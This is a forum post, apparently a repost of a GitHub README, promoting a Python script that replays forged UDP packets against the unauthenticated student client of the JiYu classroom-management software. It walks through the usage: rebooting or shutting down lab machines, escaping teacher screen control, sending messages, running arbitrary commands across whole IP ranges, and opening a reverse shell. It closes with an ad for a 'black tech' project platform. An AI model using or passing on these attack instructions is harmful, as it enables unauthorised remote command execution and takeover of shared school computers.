【HR】【搬运】极域电子教室数据包(udp)重放攻击脚本(1)

[复制链接]
查看690 | 回复0 | 2022-11-14 08:17:58 | 显示全部楼层 |阅读模式

【团队图】
【声明】github搬来的,看三楼没有就发一下因为极域的学生端没有对接收到的udp包做(=?ω?=)身份验证,导致了我们可以构造特定的数据包让学生端来执行,从而实现命令执行攻击机房内上线的任意学生端机器。  运行环境  Python3版本说明v1.5     修复命令执行bugv1.4     代码重构,优化参数选取逻辑  反弹shell功能增加随机端口  更新文档v1.3     脱离/恢复屏幕控制  支持反弹shell  v1.2     修复bugv1.1     -g 选项支持获取学生端监听的端口  v1.0  首次提交使用方法usage:       -------------- Github Repositories ----------      https://github.com/ht0Ruial/Jiyu_udp_attack[-h] -ip IP [-p P] [-msg MSG] [-c C] [-l L] [-t T]    [-e {r,s,g,nc,break,continue}]    {r,s,g,nc,break,continue} ... positional arguments:  {r,s,g,nc,break,continue}-e 参数的详细说明r reboot 重启   s shutdown 关机     g 独立选项,获取当前的ip地址以及学生端监听的端口       nc 独立选项,反弹shell的机器需出网,退出可使用命令exitbreak 独立选项,脱离屏幕控制,需要管理员权限       continue 独立选项,恢复屏幕控制 optional arguments:-h, --help show this help message and exit-ip IP ip 指定目标IP地址-p P port 指定监听端口,默认端口为4705 -msg MSG send_message发送消息 eg: -msg "HelloWord!"-c C command命令 eg: -c "cmd.exe /c ipconfig"-l L 循环次数,默认为1    -t T 循环时间间隔,默认是22秒 -e {r,s,g,nc,break,continue} Extra Options加载额外的选项 eg:-e r使用例子Tips:  使用 -ip 参数指定目标IP时,可以有以下几种指定方式:   指定单个IP,如 192.168.80.12指定IP范围,如 192.168.80.10-56指定IP所在C段,如 192.168.80.1/24 1.获取内网ip地址及监听的端口,若学生端监听端口不是默认的4705,则在后续操作过程中需使用 -p 参数指定端口 python Jiyu_udp_attack.py -e g2.脱离屏幕控制  当前运行权限需为管理员权限,主要用于开启MpsSvc服务 python Jiyu_udp_attack.py -e break3.恢复屏幕控制python Jiyu_udp_attack.py -e continue 4.发送消息  若学生端监听端口为4705,向IP地址为192.168.80.12的机器发送一条内容为"hello,baby!"的消息 python Jiyu_udp_attack.py -ip 192.168.80.12 -msg "hello,baby!"若学生端监听端口为4605,需使用 -p 参数指定端口,向IP地址为192.168.80.12的机器发送一条内容为"hello,baby!"的消息 python Jiyu_udp_attack.py -ip 192.168.80.12 -p 4605 -msg "hello,baby!"5.执行命令  给192.168.80.12到192.168.80.137弹一个计算器python Jiyu_udp_attack.py -ip 192.168.80.12-137 -c calc.exe 内容放不下了,发下个帖子里
aaaa
村长黑科技是专业提供项目资源的服务的村长黑科技平台,如合购网赚项目、引流推广软件、软件程序开发等项目就选村长黑科技平台,参与或发布项目定制各种软件就来村长黑科技平台
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则